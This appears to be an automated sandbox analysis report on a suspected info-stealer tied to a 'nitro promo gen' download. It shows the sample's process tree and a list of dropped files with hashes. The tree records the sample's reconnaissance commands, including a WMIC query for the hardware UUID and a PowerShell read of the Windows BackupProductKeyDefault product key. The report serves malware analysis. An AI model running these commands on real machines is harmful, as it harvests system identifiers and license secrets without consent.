                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            3⤵
                                                                              PID:500
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                4⤵
                                                                                  PID:2520
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                3⤵
                                                                                  PID:804
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3068
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:756
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:884
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:2156
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:4644
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://logsbins.sh/
                                                                                  1⤵
                                                                                  • Enumerates system info in registry
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  • Suspicious use of SendNotifyMessage
                                                                                  PID:3336
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd35dd3cb8,0x7ffd35dd3cc8,0x7ffd35dd3cd8
                                                                                    2⤵
                                                                                      PID:3356
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2024 /prefetch:2
                                                                                      2⤵
                                                                                        PID:1152
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 /prefetch:3
                                                                                        2⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:3504
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2508 /prefetch:8
                                                                                        2⤵
                                                                                          PID:1888
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
                                                                                          2⤵
                                                                                            PID:3864
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1
                                                                                            2⤵
                                                                                              PID:2612
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4060 /prefetch:1
                                                                                              2⤵
                                                                                                PID:1284
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
                                                                                                2⤵
                                                                                                  PID:588
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
                                                                                                  2⤵
                                                                                                    PID:784
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5112 /prefetch:8
                                                                                                    2⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:3224
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5572 /prefetch:8
                                                                                                    2⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4632
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5392 /prefetch:1
                                                                                                    2⤵
                                                                                                      PID:4488
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:1552
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4020
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:1744
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5680 /prefetch:1
                                                                                                            2⤵
                                                                                                              PID:2736
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1
                                                                                                              2⤵
                                                                                                                PID:4852
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5804 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1276
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2012,12834830216822063820,1399397078496505449,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2104 /prefetch:2
                                                                                                                  2⤵
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:2028
                                                                                                              • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:3964
                                                                                                                • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                  C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:1324
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.bing.com/search?q=nitro+promo+gen.exe&FORM=IE8SRC
                                                                                                                    1⤵
                                                                                                                      PID:2544
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd35dd3cb8,0x7ffd35dd3cc8,0x7ffd35dd3cd8
                                                                                                                        2⤵
                                                                                                                          PID:2560

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                        Filesize

                                                                                                                        2KB

                                                                                                                        MD5

                                                                                                                        627073ee3ca9676911bee35548eff2b8

                                                                                                                        SHA1

                                                                                                                        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

                                                                                                                        SHA256

                                                                                                                        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

                                                                                                                        SHA512

                                                                                                                        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        c03d23a8155753f5a936bd7195e475bc

                                                                                                                        SHA1

                                                                                                                        cdf47f410a3ec000e84be83a3216b54331679d63

                                                                                                                        SHA256

                                                                                                                        6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca

                                                                                                                        SHA512

                                                                                                                        6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        3d68c7edc2a288ee58e6629398bb9f7c

                                                                                                                        SHA1

                                                                                                                        6c1909dea9321c55cae38b8f16bd9d67822e2e51

                                                                                                                        SHA256

                                                                                                                        dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b

                                                                                                                        SHA512

                                                                                                                        0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        58bb68132d772790e182db89515b149d

                                                                                                                        SHA1

                                                                                                                        fa8d8e8fb79dae1c6be86b44648eb27c1655966b

                                                                                                                        SHA256

                                                                                                                        8437e2bab79a484bf6c91e9b46ca1ce2fd7ca39c47f5ce36693fe0ff5fcc7412

                                                                                                                        SHA512

                                                                                                                        4568892ab47f53542d3d02042d05c6cd54419bd39449cebb99dc885ab746bc2f3226b9a065975ad778a257c02843973bc2bea6407de6e399f2b800fb98ce81fa

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                        Filesize

                                                                                                                        471B

                                                                                                                        MD5

                                                                                                                        800abd285601de95a983fbae5075fb7e

                                                                                                                        SHA1

                                                                                                                        5e262023c6a95042c5ecdd5da821e04afc8db777

                                                                                                                        SHA256

                                                                                                                        9b904e61a3beccaec82c0937237be9ba981d9a97b8ee4602da5bca4d852f81fa

                                                                                                                        SHA512

                                                                                                                        544c3560e08e2b52a563b7d7dad5add052cf9c9cc65e97e182349d86b1b05a82aac883a542cdba40a1ec1f425a7855eddeb74e5a62e084df2cd5dafe76848c8c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        7b2f457e2b64bce068a367c471332a4f

                                                                                                                        SHA1

                                                                                                                        420e4bf114ab8d7f32997d4846e58366e99504e3

                                                                                                                        SHA256

                                                                                                                        793f3b014c8e45f5d64373bda059f2b53cf403671a0dc16651f45facd3ddb614

                                                                                                                        SHA512

                                                                                                                        36da325a2adac3d64567d5207e67b68533f9c62834cf25d0170bd2c3cab9a0187ebb8927042a00b29d0bf8422c90830c7b0650184fe98ecfd574491b33e52451

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        f6462713b6a6fc98fcb034094daf6043

                                                                                                                        SHA1

                                                                                                                        e3234a813ae7b163ebc69b8328689091cafee4ac

                                                                                                                        SHA256

                                                                                                                        c6ffdb5eab3c5b335118a2983e1c05713abefad47a999c201a4d0fd74efc9c1b

                                                                                                                        SHA512

                                                                                                                        bcd5624abb7ac802922487af3d745ef5507f5ef211c31aa78a70094fb96b2d3c4b4884f3be5ab6a3330f6e2092a922b0ecece6df4faed98c7f72de12a00495bc

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        b1b27e9e325c7effeb3367b6e8a81140

                                                                                                                        SHA1

                                                                                                                        3650cdb58cea2cec20d056ad4b78b0143c993176

                                                                                                                        SHA256

                                                                                                                        29fb5362b656106aee18c9b5fcc0bab41b7170b41cdea7d87814dadbb058410b

                                                                                                                        SHA512

                                                                                                                        90e972898d3fa67c24db0b48e0bae8fc6859e5c5f6640828f163c25e597c8b9e7ffba35b5046cbf236ef6d25494a44dfba494481c8e86c9d9a3f97f8c600724d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                        Filesize

                                                                                                                        16B

                                                                                                                        MD5

                                                                                                                        46295cac801e5d4857d09837238a6394

                                                                                                                        SHA1

                                                                                                                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                        SHA256

                                                                                                                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                        SHA512

                                                                                                                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                                                                                                        Filesize

                                                                                                                        16B

                                                                                                                        MD5

                                                                                                                        206702161f94c5cd39fadd03f4014d98

                                                                                                                        SHA1

                                                                                                                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                                                                                                        SHA256

                                                                                                                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                                                                                                        SHA512

                                                                                                                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        ef0af97f10d9fba1ef53f02032fb31d1

                                                                                                                        SHA1

                                                                                                                        713725e867c5627c3ec5e5e740d46e6c68a1623a

                                                                                                                        SHA256

                                                                                                                        233443fd88c64db7faae88aa927117e4a323628b6694bc63b14e57c83594666e

                                                                                                                        SHA512

                                                                                                                        35c912be8c80ae2d9ad76b91698a3ec6ec91e56621c4e4d492e313945f30764c0afe9217080537abf15804c85364725f22964a672d1f2ef943cf25ec62ab1eb7

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        62895b0ed3a224b22e5798fcbff1bf6b

                                                                                                                        SHA1

                                                                                                                        27c0feb9c68eff0479c8f461ec9f0d76bb1841df

                                                                                                                        SHA256

                                                                                                                        7c6e065ff17f24b15fbc3512c621d4fcdf5be54893de93eb253c2c66c265e191

                                                                                                                        SHA512

                                                                                                                        6991a6fafeefbba9376ad861c9f0df8779b93d69e696f861a8c622ce5fd42cde852b9270b59611a3d002fb964cddd9b903f8f9f3a6e56bf9a2785e67f40be017

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Filesize

                                                                                                                        944B

                                                                                                                        MD5

                                                                                                                        2e8eb51096d6f6781456fef7df731d97

                                                                                                                        SHA1

                                                                                                                        ec2aaf851a618fb43c3d040a13a71997c25bda43

                                                                                                                        SHA256

                                                                                                                        96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864

                                                                                                                        SHA512

                                                                                                                        0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        57c194f586803579676120e2c0acaed4

                                                                                                                        SHA1

                                                                                                                        9e28d59ff243dabad248f8fa2103c2eb1a857cc2

                                                                                                                        SHA256

                                                                                                                        b36ea640959ad1d25bac8b246172e1342e68ada5847497b2c57a276d2920d4eb

                                                                                                                        SHA512

                                                                                                                        419a630b0342cf9f60f4fe3a5578d984ce85eb987c6c7ead0bf0d0ae687f042bcdea81a0d063f7e352ddbb12ca5eda9f603cabdc671efd67e31c126a80646923

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Filesize

                                                                                                                        944B

                                                                                                                        MD5

                                                                                                                        906523560f8af295fe0b398799658002

                                                                                                                        SHA1

                                                                                                                        b6b3d1f077ae0c39ac71d138630744856c0e424d

                                                                                                                        SHA256

                                                                                                                        9f1750afbd8fd87ce27d8ecb32a9dfc9247ca360055a34fb25780c3685995ced

                                                                                                                        SHA512

                                                                                                                        4dacd67d05b3648ce9ec59833aeca1c4683e25a8c0ab13297bede5168487e3c9a0608b9c93bb4e3baa2bd3a5414672f62c55b7386813d814e2cb44cd926f566b

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        d0e5c83f4a8d7d08b5e13d6df31d532b

                                                                                                                        SHA1

                                                                                                                        590f1fb029f32ae24bb3f4b825a8bec49797fc04

                                                                                                                        SHA256

                                                                                                                        1516e104a38f583c8d4cfa6d0d1342ed77218719508224e4a4ce96053ec98ae9

                                                                                                                        SHA512

                                                                                                                        a2bcec2362a5d3b5c9f08526d86c0cff55a116d0b83885aedcaddac9bf0dc2a7ef5f9483b56441f6e150c5ef765aa59906133eb970fd2bd7c8e7e56a99f09fdd

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RES7D1F.tmp

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        9ba274a9b14f0867bf213c96cc619d70

                                                                                                                        SHA1

                                                                                                                        22f0069538b3453e268b34f37b69d12a27be89f2

                                                                                                                        SHA256

                                                                                                                        f717149cf72400cf8eaa51bac9f0f33567068e41ff8dcd84ee99010c309093d7

                                                                                                                        SHA512

                                                                                                                        58c3365705e3777de8c66ed03a6694a99d98ec21835746a0c9fc3605bfab7aee8b14143b65050e55f212da4b9a252248f442cafad56dc9f3bb6277b043636fe2

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\VCRUNTIME140.dll

                                                                                                                        Filesize

                                                                                                                        116KB

                                                                                                                        MD5

                                                                                                                        be8dbe2dc77ebe7f88f910c61aec691a

                                                                                                                        SHA1

                                                                                                                        a19f08bb2b1c1de5bb61daf9f2304531321e0e40

                                                                                                                        SHA256

                                                                                                                        4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

                                                                                                                        SHA512

                                                                                                                        0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_bz2.pyd

                                                                                                                        Filesize

                                                                                                                        48KB

                                                                                                                        MD5

                                                                                                                        5cd942486b252213763679f99c920260

                                                                                                                        SHA1

                                                                                                                        abd370aa56b0991e4bfee065c5f34b041d494c68

                                                                                                                        SHA256

                                                                                                                        88087fef2cff82a3d2d2d28a75663618271803017ea8a6fcb046a23e6cbb6ac8

                                                                                                                        SHA512

                                                                                                                        6cd703e93ebccb0fd896d3c06ca50f8cc2e782b6cc6a7bdd12786fcfb174c2933d39ab7d8e674119faeca5903a0bfac40beffb4e3f6ca1204aaffefe1f30642c

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_ctypes.pyd

                                                                                                                        Filesize

                                                                                                                        59KB

                                                                                                                        MD5

                                                                                                                        4878ad72e9fbf87a1b476999ee06341e

                                                                                                                        SHA1

                                                                                                                        9e25424d9f0681398326252f2ae0be55f17e3540

                                                                                                                        SHA256

                                                                                                                        d699e09727eefe5643e0fdf4be4600a1d021af25d8a02906ebf98c2104d3735d

                                                                                                                        SHA512

                                                                                                                        6d465ae4a222456181441d974a5bb74d8534a39d20dca6c55825ebb0aa678e2ea0d6a6853bfa0888a7fd6be36f70181f367a0d584fccaa8daa940859578ab2b8

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_decimal.pyd

                                                                                                                        Filesize

                                                                                                                        107KB

                                                                                                                        MD5

                                                                                                                        d60e08c4bf3be928473139fa6dcb3354

                                                                                                                        SHA1

                                                                                                                        e819b15b95c932d30dafd7aa4e48c2eea5eb5fcb

                                                                                                                        SHA256

                                                                                                                        e21b0a031d399ffb7d71c00a840255d436887cb761af918f5501c10142987b7b

                                                                                                                        SHA512

                                                                                                                        6cac905f58c1f25cb91ea0a307cc740575bf64557f3cd57f10ad7251865ddb88965b2ad0777089b77fc27c6d9eb9a1f87456ddf57b7d2d717664c07af49e7b58

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_hashlib.pyd

                                                                                                                        Filesize

                                                                                                                        35KB

                                                                                                                        MD5

                                                                                                                        edfb41ad93bc40757a0f0e8fdf1d0d6c

                                                                                                                        SHA1

                                                                                                                        155f574eef1c89fd038b544778970a30c8ab25ad

                                                                                                                        SHA256

                                                                                                                        09a0be93d58ce30fa7fb8503e9d0f83b10d985f821ce8a9659fd0bbc5156d81e

                                                                                                                        SHA512

                                                                                                                        3ba7d225828b37a141ed2232e892dad389147ca4941a1a85057f04c0ed6c0eab47b427bd749c565863f2d6f3a11f3eb34b6ee93506dee92ec56d7854e3392b10

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI4042\_lzma.pyd

                                                                                                                        Filesize

                                                                                                                        86KB

                                                                                                                        MD5

                                                                                                                        25b96925b6b4ea5dd01f843ecf224c26

